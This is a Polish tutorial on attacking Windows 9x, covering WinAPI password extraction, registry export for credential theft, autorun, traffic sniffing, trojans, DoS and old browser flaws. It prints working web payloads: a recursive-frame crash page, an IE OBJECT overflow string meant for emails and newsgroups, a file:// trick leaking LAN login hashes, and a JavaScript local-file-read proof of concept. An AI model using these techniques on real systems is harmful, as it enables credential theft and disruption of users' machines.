atak w win9x F23Y7P354QOF3LBU3NYOA6DVNISRE4S23GMRMDY


Atak w win9x

To jest kilka sposobów żeby utrudnić nieprzyjacielowi życie...

I Wstep
1. Wstęp
2. Opisik WinAPI
3. Narzedzia
II Ataki lokalne
1.   Hasla
1.1 Programy: pocztowe, ftp
1.2 Dial-up
1.3 Sniffing wiadomości
2.   AUTORUN
3.   Korzystanie rejestru (kradzież)
3.1 Klucze
3.2 Korzystanie z rejestru
4.   Podglądanie transmisji
4.1 WinSpy
4.2 Tunel
4.3 FS
5.   Kon trojanski
5.1 Winsock
5.2 Autostart w rejestrze
5.3 Ukrywanie procesu
III Ataki z sieci
1.   Ataki DoS-owskie
2.   Hasla
2.1 ICQ
2.2 Ws_Ftp
3.   ActiveX
4.   Bledy Internet Explorer
4.1 Ramki rekursywne
4.2 Buffer Overflow EMBEDED
4.3 Przekazywanie hasla
4.4 Wysylanie pliku na innego kompa
5.   Bledy Netscape
6.1 Buffer Overflow w BOOKMARKS
7.   Zdalny dostep poprzez Konia Trojankskiego

I Wstęp
Jak potocznie wiadomo nie istnieje coś takiego jak ochrona danych w systemie Windows 9x, przynajniej na poziomie “gołego” systemu taka możliwość nie została przewidziana przez firmę Microsoft. Co prawda istnieje system haseł ale jest on nie funkcjonalny, nie istnieje równierz żaden mechanizm sprawdzania dostępu do plików czy innych zasobów systemu, jakby tego było mało z pomocą intruzom przychodzi WinAPI, w którym aż roi się od funkcji umożliwiających wykorzystanie systemu “nie zgodnie z instrukcją obsługi”. Jednak ten przypadek tylko potwierdza regułę, że dostajemy to za co płacimy - tani system operacyjny do domowego użytku, prosty w obsłudze i bardzo popularny - niestety często zapominają o tym ludzie, którzy powinni być odpowiedzialni za ochronę jakiegoś rodzaju danych elektronicznych, zrobiłem kiedyś eksperyment i przeszedłem się po kilku ważnych punktach administracyjnych, po sklepach, targach i kawiarniach internetowych - w bardzo wielu miejscach znalazłem nasz ulubiony OS, co gorsza w niektórych był podłączony do Internetu a każdy klient mógł sobie z niego skorzystać - i co z tego ? Głownie to, że system ten nie powinien być traktowany jak system do wszystkiego, a jeżeli już “wpinamy” go do sieci przedtem przygotujmy sobie solidną grupę prawników - bo co będzie jeśli z Windowsa stojącego w naszej kawiarence ktoś się włamie np. Na server jakiejś instytucji rządowej ??? Oczywiście w logach nic nie zostanie - bo logów nie ma, możemy nawet mięc zainstalowanego konia trojańskiego (o nich dalej) i nasz poczciwy Windows “do wszystkiego” będzie doskonałą bramką dla włamywacza, która pozwoli mu zamaskować się w atakowanym (docelowo) systemie. Podsumowując: Windows ochrony nam nie daje, więc zapewnijmy ją sami, przed czym się chronić ? O tym właśnie będzie dalej ;-)


2.Opisik WinAPI
Jak już wspomniałem wyżej wiele luk bezpieczeństwa związanych jest z samym systemem, aby je zrozumieć należy w minimalnym stopniu przyswoić sobie działanie WinAPI (Windows Application Programming Interface) - postaram się to zrobić w miare przystępnie - tak więc osoby znające temat mogą swobodnie ominąć ten paragraf. Zacznijmy od tego, że wszystkie obiekty graficzne widziane na ekranie czyli: przyciski, pola tekstowe, listy wyboru itp. Są przez system traktowane tak samo - każdy taki obiekt jest oddzielnym oknem, które podlega pewnym zależnościom typu `potomek' i `rodzic', każde okno ma właściwości określające: kolor, czcionkę, wygląd i rożne inne cechy specyficzne dla klasy danych okienek, każde okno ma równierz zdefiniowane procedury obsługi wiadomości przychodzących gdzieś z systemu, bądź to od użytkownika czy innej aplikacji - co to są wiadomości ? Jest to bardzo sprytny mechanizm systemu powiadamiania jego komponentów, bądź procesów o tym, że zaistniało jakieś zdarzenie np. Użytkownik wpisał text do okienka klasy TextEdit (okienko tekstowe), system wysłał do kolejki wiadomości polecenie SetText(ustaw text) w momencie kiedy okienko obsłuży wszystkie wiadomości w kolejce i dojdzie do SetText - w polu tekstowym zostanie wyświetlona wartość wpisana przez użytkownika - a po co są kolejki wiadomości ? Po to żeby okienko wiedziało które rzeczy ma obsługiwać i w jakiej kolejności, WinAPI udostępnia funkcje, które pozwalają podglądać kolejki wiadomości dla dowolnego okienka, udostępnia równierz funkcje służące do odczytywania właściwości okienek oraz wartości tych właściwości np. Okienko tekstowe `Edit' ma właściwość typu `Text', która jest wyświetlana i jest odwzorowaniem tego co wpisał użytkownik, okienko to jest identyfikowane za pomocą uchwytu, który jest unikalnym identyfikatorem w skali systemu tak więc kiedy już go zdobędziemy możemy z takim okienkiem zrobić wszystko - a po co to, skoro tekst okna tekstowego zawsze widać ? Istnieje bardzo sprytna właściwośc okienek tekstowych mianowicie `PasswdChar' jeśli jest odpowiednio ustawiona to okienko zamiast wyświetlać nam właściwość `Text' wyświetla znaczki *** (tyle ile jest liter w `Text') - jest to doskonale znane z wszystkich programów, w których trzeba wprowadzić hasło - jednak jest to tylko pozorna ochrona gdyż właściwość `Text' dalej zawiera prawidłowy napis (np. Hasło użytkownika). Warto jeszcze wiedzieć, że wszystkie funkcje mogą być wykonywane przez dowolny program, gdyż jak wiadomo w windowsie nie ma praw dostępu przydzielanych konkretnym użytkownikom.


3. Narzędzia
Do `zabawy' z Windowsem przyda się kilka narzędzi: WinSight [Windows and messages viewer] - aplikacja dostarczana z produktami firmy Borland (obecnie Inprise) - pozwala między innymi podglądać wiadomości wysyłane do docelowych okien. Tunel - prosty programik tunelujący transmisję TCP/IP, jako dodatkową opcję ma możliwość podglądania całej transmisji w konsolowym okienku FS [Fake Server] - program, który udaje server jakieiś usługi, został napisany do testowania protokołów sieciowych i ich klientów, ale doskonale może posłużyć jako sniffer haseł np. Programów pocztowych - ma możliwość podglądu i logowania transmisji. Listen - program, którego jedyną funkcją jest nasłuchiwanie na danym porcie i informowanie użytkownika o próbach połączenia - może służyć do monitorowania portu 139 i chronić przed sławetnym WinNukiem DUP [Dial-up passwd] - programik, który używając funkcje WinAPI `wyciąga' hasła służące do łączenia się z Internetem. PortScanner - służy do skanowania portów zdalnego hosta, pozwala określić, które usługi (i w jakich wersjach) są włączone na serverze ICQThief - podszywa się pod server ICQ i pokazuje hasło ofiary. Winspy.dll - biblioteka, która podsywa się pod winsock.dll (obsługa TCP/IP) i pozwala śledzić wszystkie odwołania do niej wraz z parametrami. Netstat - standardowy program do sprawdzania połączeń dołączony do systemu. Programy: Tunel, FS, Listen i DUP można pobrać ze strony http://dione.ids.pl/~jan


II Ataki lokalne


1.Hasla


1.1 Programy: pocztowe, ftp


Tutaj bardzo często mamy do czynienia z brakiem wyobraźni programistów - hasła takich programów przeważnie da się albo rozkodować albo wykorzystać bez rozkodowywania - najczęściej są zapisywane w rejestrze w formie zaszyfrowanej (często słabymi algorytmami) albo w plikach konfiguracyjnych. Najprostszą metodą na ich użycie jest zdobycie pliku konfiguracyjnego / kawałka rejestru z odpowiednim kluczem i umieszczenie go w swoim komputerze w skonstruowanej uprzednio konfiguracji softwarowej - dokładnie w tym miejscu, z którego został pobrany - to sprawi, że program będzie traktował dany wpis jak swój własny i sam zajmie się rozkodowaniem odpowiednich danych. Jeśli z jakichś powodów w/w metoda jest niemożliwa do zastosowania to należy rozkodować hasło znajdujące się w rejestrze lub pliku - jak do tej pory udało się złamać hasła do WS_Ftp, IEMail (poprzednik Outlooka), Netscape, Cute_FTP, wszędzie powód był prosty - słaby algorytm kodowania.


1.2 Dial-up
WinAPI zawiera funkcje do obsługi połączenia z Internetem przez modem telefoniczny, wśród nich znajdują się takie którymi można ustawić bądź pobrać ustawienia parametrów połączenia. Funkcja: DWORD RasGetEntryDialParams( LPTSTR lpszPhonebook, // pointer to the full path and filename of the phonebook file LPRASDIALPARAMS lprasdialparams, // pointer to a structure that receives the connection parameters LPBOOL lpfPassword // indicates whether the user's password was retrieved ); Pozwala każdemu programowi na pobranie informacji o konkretnym połączeniu - łącznie z hasłem, na działaniu tej funkcji opiera się program DUP, dodam tylko, że hasło nie jest w rzaden sposób kodowane!


1.3 Sniffing wiadomości
Jak już wspomniałem wyżej, możliwe jest ustawienie tak zwanych procedur HOOK, do których będą przekazywane wiadomości skierowane do danego okienka to pozwala nam podglądać różne jego parametry, pozwala równierz na napisanie ciekawych narzędzi np. Można w ten sposób znajdować okna, które dopiero co zostały zamknięte lub otwarte - najprościej jet to zrobić z pomocą programu WinSight oto co należy wykonać: Włączamy WinSight W menu Spy ustawiamy opcję `Follow focus' W menu Messages ustawiamy opcję `All windows' W oknie Messages / Options ustawiamy tylko opcję `Window' W oknie Messages / Processes ustawiamy te procesy, które nas interesują. Po kliknięciu na okienku, w którym jest zamaskowany tekst w postaci `******' w pierwszej części okna WinSighta pokazują się właściwości tego okienka wraz z tekstem w postaci jawnej, jeśli klikniemy dwukrotnie na tej pozycji pokaże się okno z dokładnymi właściwościami okienka - widać, że jest ustawiona właściwość Password na true. W dolnej części okna można śledzić wiadomości jakie są wysyłane do okienka docelowego , po kliknięciu na okienku tekstowym - jeśli okno macierzyste jest okienkiem dialogowym zostaje wysyłana wiadomość WM_GETDLGCODE, która zwraca m.in. wartość tekstu w okienku - nie jest to oczywiście jedyna wiadomość, którą da się wykorzystać w ten sposób - zachęcam do eksperymentowania.


2. Autorun
To bardzo ciekawy wynalazek firmy z Redmont, jesłi na dysku CD-ROM umieścimy plik autorun.inf Który będzie zawierał tekst:
[autorun] OPEN=NAZWA_PROGRAMU.EXE
To odrazu po włożeniu CD do kieszeni wykona się program NAZWA_PROGRAMU.EXE niesie to ze sobą potencjalne zagrożenie - ten program wcale nie musi mieć dobrych zamiarów, a na dodatek może ukryć się w systemie tak aby użytkownik nie mógł go zauważyć nawet po naciśnięciu CTRL+ALT+DEL. Szczególnie trzeba uważać na plyty z pirackim oprogramowaniem które powyższy trik mogą wykorzystywać.


3. Korzystanie z rejestru (kradzież)
Do operacji na rejestrze służy program REGEDIT - ma on bardzo ciekawą opcję, może zostać uruchomiony bez pokazywania okienka parametr `-e' służy do eksportowania rejestru bądź jego części do pliku .reg (plik tekstowy) Polecenie:
regedit -e c:1.reg HKEY_CURRENT_USER
utworzy plik 1.reg w katalogu głównym dysku C: zawierający klucz HKEY_CURRENT_USER Software w zależności od ilości zainstalowanego oprogramowania plik ten będzie zawierał od kilkuset kilobajtów do kilku megabajtów, u mnie miał 156kb po kompresji 22kb czyli rozmiar idealny do przesłania przez Internet.


3.1 Klucze
Autostart - [HKEY_CURRENT_USER] Wszystko co tu umieścimy zostanie wykonane podczas startu systemu. Ustawienia programów - [HKEY_CURRENT_USER] Konfiguracja, hasła, numery seryjne itp.


3.2 Korzystanie z rejestru
Jeśli już mamy fragment czyjegoś rejestru i chcemy korzystać z jakiegoś hasło to aby nie bawić się w zbędne rozkodowywanie haseł po prostu trzeba zaimportować u nas odpowiednie klucze z utworzonego na komputerze ofiary pliku .reg - docelowy program potraktuje to jako oryginalną konfiguracje i sam się wszystkim zajmie.


4. Podglądanie transmisji
Jeśli w jakimś celu (wiadomo jakim), chcemy podejrzeć transmisję prowadzoną między dwoma hostami to można to zrobić na 3 różne sposoby: przechwycić odwołania do biblioteki winsock.dll, przepuścić całą transmisję przez naszą aplikację lub śledzić to co jest wysyłane kablem, o ile ta trzecia metoda łączy się z ingerencją w sterowniki to pierwsze dwie można z powodzeniem wykonać - nie muszę chyba przypominać, że transmisje w protokołach SMTP, NNTP, FTP, HTTP itp ;-) nie jest kodowana - tak więc wszystkie hasła, loginy etc. mogą być łatwo podglądane.


4.1 WinSpy
Podszywa się pod bibliotekę winsock.dll i loguje wszystkie odwołania do niej łacznie z parametrami przekazywanymi do odpowiednich funkcji, jest o tyle dobry że można za jego pomocą prześledzić dokładnie co robi aplikacją z otwartym socketem, można monitorować transmisję UDP.


4.2 Tunel
Prosty programik który służy do przekazywania transmisji z jednego socketa do drugiego możemy np. `przepuścić' przez niego sesję IRC, albo sesję POP3 żeby poznać hasło wysyłane do servera - w tym programie oprócz niego samego niezbędny jest jeszcze server, do którego można by przekierowywać transmisję (redirect), działa tylko dla TCP.


4.3 FS
Fake Server jak sama nazwa wskazuje udaje server dowolnej usługi - w pliku konfiguracyjnym należy mu wpisać schemat protokołu (w formacie request-reply) np. POP3 i połączyć się z nim programem-klientem, całą transmisja może być logowana.


5 Koń trojański
Konie trojańskie pod Windows9x™ to temat rzeka - co raz powstają nowe niebezpieczniejsze i bardziej zaawansowane technicznie - dlaczego ? odpowiedź jest prosta - potęga tego systemu jest wprost proporcjonalna do ilości użytkowników na świecie. Kiedyś konie trojańskie były przeważnie prymitywnymi bombami logicznymi, lub zwykłymi programami destrukcyjnymi - teraz istnieją takie które w środowisku unixowym zwykło nazywać się `backdorami'. Mechanizmy, które oferuje sam system bardzo sprzyjają takim programom - można np. Zupełnie ukryć proces, zrobić go `niezabijalnym', uruchomić program przy starcie systemu bez wiedzy użytkownika czy wreszcie otworzyć na jakimś porcie server usługi telnet, który będzie służył napsatnikowi do zdalnego kontrolowania naszej maszyny. Znanymi przykładami zaawansowanych koni trojańskich są BO (Back Orifice) i BOWL (polski) - które umożliwiają sterowanie windowsem przez sieć. Rozprzestrzenianiu sie koni trojańskich służą wszelkiego rodzaju serwisy sharewarowe i gazety komputerowe zachwycające się każdym produktem rodzimych programistów - z dobrych źródeł wiem, że łatwo jest przemycić w takim programie trojana...


III Ataki z sieci


Niestety (a może naszczęśćie) nie istnieje dużo rodzajów ataków możliwych do przeprowadzenia z sieci, przeważnie są to proste ataki typu DoS (Deniale of service) bo aby była możliwa jakakolwiek prace z sieci na komputerze zaopatrzonym w system Windows - musi on mieć zainstalowane dodatkowe oprogramowanie np. BO albo BOWLA, ostatnio pojawiły się exploity wykorzystujące znane z UNIXA `buffer overflow-y' - takie programy pozwalają nawet na uruchomienie odpowiedniego programu przez sieć.


1.Ataki DoS-owskie
Ataki DoS są klasycznym przykładem ataku przeprowadzanego z sieci przeciwko systemowi Windows, na szczęście są one relatywnie mało groźne, gdyż co najwyżej spowodują utracenie danych w aktualnie używanych aplikacjach - ataki te są szczególnie niebezpieczne dla serverów a do tego celu naszczęście Windows jest rzadko używany. Klasyczne DoS'y, na które jest podatny Windows to Winnuke (od niego się zaczęło), Teardrop, Teardrop2, Synflood, Syndrop, PingOfDeath, Nestea, Nestea2, Hanson, Smurf, Click, i w zasadzie wszystkie, których działanie polega na modyfikowaniu nagłówków IP w celu błędów fragmentacji.


2.Hasla
2.1 ICQ
Dobrze wszystkim znany ICQ ma bardzo niedopracowany algorytm transmisji, która odbywa się przez sockety datagramowe (UDP) - na początku sesji klient-server do tego drugiego jest wsyłane hasło w postaci czystego tekstu - atak polega na tym aby na swoim komputerze ustawić program ICQThief, który będzie czekał na przychodzące połączenie i przechwytywał hasło.


2.2 Ws_Ftp
Starsze wersje Ws_FTP razem z plikami uploadowały na server specjalny plik konfiguracyjny, w którym między innymi zapisane było hasło użytkownika. Na szczęście ten rażący błąd został szybko zlikwidowany i dziś już nie występuje - należy dodać, że WS_FTP jest najpopularniejszym klientem tej usługi pod Windows.


3.ActiveX, java
Kontrolki ActiveX, które można stosować na stronach www obsługiwane są m.in. przez Internet Explorera, ponieważ nie istnieje tutaj w zasadzie technologia sandbox (piaskownica) znana z JVM (Java Virtual Machine) programy zapisane w tym formacie mają dostęp do wszystkich zasobów komputera - chroni przed nimi jedynie pełne wyłączenie obsługi tej technologii w przeglądarce. Teoretycznie wszystkie używane na stronach www kontrolki ActiveX powinny mieć certyfikat autentyczności, ale nawet jeśli go nie mają to można je uruchomić, a jedynym zabezpieczeniem będzie ostrzeżenie ze strony przeglądarki o wątpliwym pochodzeniu danego komponentu, w sieci można zanaleźć tzw. `evil ActiveX' ew `RadioActiveX', kontrolki które robią różne `ciekawe' rzeczy z naszym systemem. Inaczej sprawa wygląda z appletami Javy - tutaj dzięki `piaskownicy' można kontrolować co applet może a do czego nie ma prawa - poza tym sama JVM narzuca pewne ograniczenia, gdyby nie fakt że jej kod ma wiele błędów to ta technologia byłaby bardzo bezpieczna, niestety są sposoby na obchodzenie niektórych zabezpieczeń - i tak np. Istnieje applet zawieszający system.


4.Bledy Internet Explorer
Jakiś czas temu (wraz z wprowadzeniem wersji 3.0) było bardzo głośno o błędach IE, z każdą kolejną wersją programiści z całego świata mieli więcej rozrywki w odnajdywaniu luk bezpieczeństwa, w tej chwili nawet wersja 4.0 jest podatna na poważne błędy - jest to o tyle niebezpieczna, że program Outlook Express wykorzystuje biblioteki IE do wyświetlanai wiadomości i listów zapisaych w formacie HTML co w konsekwencji powoduje występowanie tam tych samych luk bezpieczeństwa. O tyle o ile na strone www musimy ofiare `ściągnąć' tak aby obejrzała nasze odpowiednio spreparowane dzieło to w przypadku listów wystarczy że wyślemy go pod odpowiedni adres.


4.1 Ramki rekursywne
Zapiszmy powyższy kod html w pliku `test.html' - jego wykonanie w przeglądarce IE (3.0-4.0) spowoduje zawieszenie programu a przy pomyślnych okolicznościach całego systemu - błąd jest bardzo prosty, IE w nieskończoność ładuje ramki `frame1' i `frame2' stronami z pliku `test.html', który zawiera kolejne ramki `frame1' i `frame2' - i tak aż do wyczerpania zasobów.

 

<HTML>

<FRAMESET COLS=”50,50”>

<FRAME NAME=”frame1” SRC=”test.html>

<FRAME NAME=”frame2” SRC=”test.html>

</FRAMESET>

</HTML>

Zapiszmy powyższy kod html w pliku `test.html' - jego wykonanie w przeglądarce IE (3.0-4.0) spowoduje zawieszenie programu a przy pomyślnych okolicznościach całego systemu - błąd jest bardzo prosty, IE w nieskończoność ładuje ramki `frame1' i `frame2' stronami z pliku `test.html', który zawiera kolejne ramki `frame1' i `frame2' - i tak aż do wyczerpania zasobów.

4.2 Buffer Overflow OBJECT

<OBJECT CLSID=AAAAAAAAAAAAAAAAAAAAAAAAAA

AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA>

Wpisanie takiego TAG'a w strone html lub e-mail spowoduje wykrzaczenie się programu - w Outlooku na dodatek nie będzie można usunąć listu ze skrzynki bo za każdym razem gdy na niego klikniemy zawiesi nam się program, jeśli przez `przypadek' post trafi na pierwszą pozycję w jakieiś grupie dyskusyjnej to użytkownik w/w programu nie będzie mógł tam wejść bo automatycznie mu się otworzy post zawierający nasz `evil code', zamiast `AAAA' można prawdopodobnie wpisać kod wyknywalny, to tylko kwestia znajomości długości bufora.

4.3 Przekazywanie hasla

Czy przeglądarka www może wysłać do internetu nasze dane włączając w to login i hasło do sieci LAN ?

Dla Wszystkich wersji systemu windows (9x, OSR2, 3.x, NT) odpowiedź brzmi: TAK, jeśli jest to wersja <=3.01 Internet Explorera lub Netscape Navigatora. Cały błąd polega na tym, że jeśli przeglądarka znajdzie w dokumencie adres w postaci:

file://\aa.bb.cc.dd

Gdzie aa.bb.cc.dd jest numerem IP odległego hosta to próbuje się z nim połączyć wysyłając dane użytkownika LAN sądząc że ma do czynienia z serverem plików. Potwierdzanie autentyczności odbywa się w taki oto sposób:

1) Najpierw server wysyła jakiś losowo wybrany ciąg znaków

2) Komputer go odbiera i szyfruje używając jako klucza hasła użytkownika

3) Zaszyfrowany text jest przesyłany do servera

4) Następnie server po kolej szyfruje oryginalny text za pomocą wszystkich haseł w bazie danych jeśli zaszyfrowane hasło będzie takie samo jak to przesłane przez klienta to połączenie jest nawiązywane.

W ten sposób sprawdzana jest autentyczność klienta bez przesyłania jego hasła przez sieć. Jest to robione bezgłośnie i bez rzadnej informacji, atak polega na tym aby w dokumencie ukryć adres o w/w formacie wskazującym na server jakiegoś hackera, na którym jest uruchamiana specjalnie zmodyfikowana wersja servera plików, mając do dyspozycji dane przesłane przez przeglądarka można zastosować tzw. atak brute force ew. z wykorzystaniem słownika, nawet jeśli to się nie powiedzie atakujący komputer ma sporo informacji o kliencie.

4.4 Wysylanie pliku na obcy komputer

Jest błąd w IE, który pozwala przez specjalnie przygotowaną stronę www odczytać

text lub plik HTML z komputera użytkownika i wysłać jego zawartość na inny komputer.

Dzieje się to nawet kiedy użytkownik jest za firewallem.

Błąd wykorzystuje Java Script a nazwa i położenie pliku muszą być znane.

Innym sposobem na wykorzystanie tego błędu jest wysłanie specjalnie przygotowanej

wiadomości do Outlook Expressa z IE4.

The source of the page:

----Cut here---

<HTML>

<HEAD><TITLE>Read text/HTML file with Internet Explorer 4.01></TITLE></HEAD>

<BODY>

This demonstrates a bug in IE 4.01 under Windows 9x (don't know for other versions), which allows reading text or HTML file on the user's machine.

<B>Create the file c:.txt</B> and its contents are shown in a message box. The file may be sent to an arbitrary server even if behind a firewall.

<BR>

To test it, you need Javascript enabled.

<BR>

This file is created by <A HREF=http://www.geocities.com/ResearchTriangle/1711>Georgi Guninski.</A>

<br>

<SCRIPT LANGUAGE="JAVASCRIPT">

<br>

alert("This page demonstrates reading the file C:\test.txt (you may need to create a short file to view it)");

var x=window.open('file://C:/test.txt');

x.navigate("javascript:eval("var a=window.open('file://C:/test.txt');r=a.document.body.innerText;alert(r);")");

</SCRIPT>

</BODY>

</HTML>



Wyszukiwarka

Podobne podstrony:
atak, STUDIA, Konspekty, kons. Piłka Ręczna
atak serca
Atak nowej grupy hakerów Tusk jest
5x02 (70) Pierwszy atak psow, Książka pisana przez Asię (14 lat)
atak na zsrr III rzeszy
Ręczna ATAK SZYBKI
atak na zamek GRBAXCLBDCJGEALWAKCGRJ5W32ZXPZNDM3MXG5I
Koszykówka atak szybki 02 10 15
OSTRY ATAK JASKRY
Jak wykryć atak czarnego PR
Koszykówka atak szybki 02 10 15
Atak na konsumenta, Kto nas oszukuje
Atak, Emisja głosu - Ćwiczenia dla wokalistów
Uwaga! Atak islamskich?nkierow
Wells H G Atak z glebiny
03 Atak na World Trade Center
atak na sesje netbiosu

więcej podobnych podstron